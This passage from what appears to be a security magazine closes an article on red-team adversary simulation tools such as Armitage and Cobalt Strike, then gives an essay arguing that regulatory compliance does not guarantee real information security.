teams that explore alternative futures and write articles as if they were foreign world leaders.Little
formal doctrine or publications about Red Teaming in the military exist.[1]
LtCol Brendan S. Mulvaney Marine Corps Gazette July 2012. "Strengthened Through the Challenge"(PDF).
33
- War Games
34
Why some organizations remediate successfully and eciently, and why others struggle
THE TOOLS
The tool needs for Adversary Simulations are far dierent. A unique covert channel matters far more
than an unpatched exploit. A common element of Adversary Simulations is a white box assumed
breach model. Just as often as not, an Adversary Simulation starts with an assumed full domain
compromise. The goal of the operator is to use this access to achieve eects and steal data in ways
that help exercise and prepare the security operations sta for what theyre really up against.
Remember too, that the threat actor in a production environment may also be an employee of the
company, acting inside the corporate network.
ADVERSARY SIMULATION TRAINING
The tools for Adversary Simulation are coming. The tools alone are not the full package however.
Adversary Simulations require more than good tools, they require good technicians.
TRADECRAFT
Raphael Mudge uses the term Tradecraft to describe the mindset for Adversary Simulations. He says
that they require an appreciation for the ecacy that simply isnt there in the penetration testing
community yet. Tradecraft are the best practices of a modern Adversary. What is the adversarys
playbook? What checklists do they follow? Why do they do the things they do?-these are questions
that need to be asked by a corporates security defenders.
THE BEST DEFENSE IS A GOOD OFFENCE
Both Armitage and Cobalt strike pack enough oensive capability to both abruptly take down
a network instantly as well as the ability to act as a long term data exfiltrator. Penetration Testers will
get the most benefit from the current version of Armitage due to its use of the Metasploit Framework
and ready-made exploits. Threat Actors will get the most benefit from Cobalt Strike 3.0 due to its
Beacons and Social Engineering tool set. Whichever tool you use wield it like a sword so the
network defenders can develop their defensive skills.
source: http://www.mediacontour.com
35
"Target was certified as meeting the standard for the payment card industry in September 2013.
Nonetheless, we suered a data breach."Target Chairman, President, and Chief Executive Ocer
Gregg Steinhaf
In Information Security, there are a plethora of Laws and Regulations: SarbanesOxley Act (SOX);
Payment Card Industry Data Security Standard (PCI DSS); GrammLeachBliley Act (GLB); Electronic
Fund Transfer Act, Regulation E (EFTA); CustomsTrade Partnership Against Terrorism (CTPAT); Free and
Secure Trade Program (FAST); Children's Online Privacy Protection Act (COPPA); Fair and Accurate
Credit Transaction Act (FACTA), including Red Flags Rule; Federal Rules of Civil Procedure (FRCP).
Some of the industryspecific Guidelines and Requirements include: Federal Information Security
Management Act (FISMA); North American Electric Reliability Corp. (NERC) standards; Title 21 of the
Code of Federal Regulations (21 CFR Part 11) Electronic Records; Health Insurance Portability and
Accountability Act (HIPAA); The Health Information Technology for Economic and Clinical Health Act
(HITECH); Patient Safety and Quality Improvement Act (PSQIA, Patient Safety Rule); H.R. 2868: The
Chemical Facility AntiTerrorism Standards Regulation. How many of these Regulations, Laws,
Guidelines a business needs to adhere to would depend on what part of the world the business
operates from (or is domiciled).
Laws, Regulations, Standards and Guidelines are very familiar words when it comes to Information
Security. One other word that ties all the previous words together is Compliance. Compliance, generally
speaking, is the basis for audits. Compliance is also the native language the Executive Management
of any enterprise understands. The great debate for us however is: does compliance really translate
to good security?
What is Good Information Security? According to Malcolm Carrie, head of global strategy and
architecture at BAE Systems, good information security covers people, process and technology.
It creates the understanding, at all levels in the organization, that finding the appropriate balance
of availability, integrity and confidentiality requires a full appreciation of the risks.
The rush for Compliance has more or less taken center stage in recent times, and a lot of businesses
(and the people driving those businesses) forget or are unaware of the fact that Information Security
needs should primarily be the driving force for Compliance criteria/metrics; people would not just erect
the compliance barrier for its own sake. In order to achieve good security, appropriate processes,
practices and technologies need to be implemented. In 2014, the FBI sent a warning to the healthcare
36
industry that its data was not secure. The biggest vulnerability was the perception of IT healthcare
professionals beliefs that their current perimeter defenses and compliance strategies were working
when clearly the data states otherwise.
Lots of organizations focus on compliance and have several reams of paper to show for it policies,
procedures, and training records. Several of these organizations purchase compliance-in-a-box kits,
and because the focus is on compliance and not really security, much of the content of the compliancein-a-box kit still has the original blank spots where the name of the organization in question should have
been inserted. A lot of the organizations that eventually complete their documentation might never
incorporate the documentation into the corresponding process. Additionally, because assessment for
compliance might be primarily based on responding to hundreds of questions in compliance
assessment tools, or discussing with consultants, many businesses will maintain that the security
described in their policies and procedures is really in place. They might even believe it themselves!
The importance of compliance cannot be overemphasized but true Information Security goes way
beyond ticking boxes and answering a few generic questions that the consultant may have prepared.
The goal of compliance programs is to satisfy externally imposed requirements, and the requirements
in point may or may not support an eective security program. The fact that a company has been
certified compliant does not guarantee that it is secure, and some obligations that it fulfills may not
contribute anything to security. For every business that can aord it, building an inhouse IT security
team might be the best way to go, and for businesses that are unable to aord it, having
a knowledgeable consultant(s) review their business process and advise, as well as help implement
appropriate security solutions, would be the way to go.
Irrespective of the sector a business operates in, the management needs to know that hackers will
always look for loopholes, and unless a business implements a comprehensive security program, and
remains eternally vigilant, hackers will always find the loopholes they want, either by exploiting the OS,
the infrastructure, the firmware, the process or the people. Risk analysis is also a very critical success
factor in information security. Businesses should determine how much risk they are exposed to and
plan accordingly after appropriately classifying the risk. Risk analysis should be done as regularly
as practicable to ensure that no part of the business process is being excluded.
Ensuring that the IT security team is knowledgeable and dedicated is also a major requirement that
needs to be addressed. One can never know how truly secure a system is until it has been tested. The
IT security team (complementary to the testing by external consultants) needs to routinely conduct
penetration testing exercises to evaluate every facet of the business process, not with the intention
of achieving regulatory compliance but with the objective of determining the security posture of the
business in order to apply any needed corrective measures before vulnerabilities are exploited by
hackers.
About the author:
AYO TAYO BALOGUN
37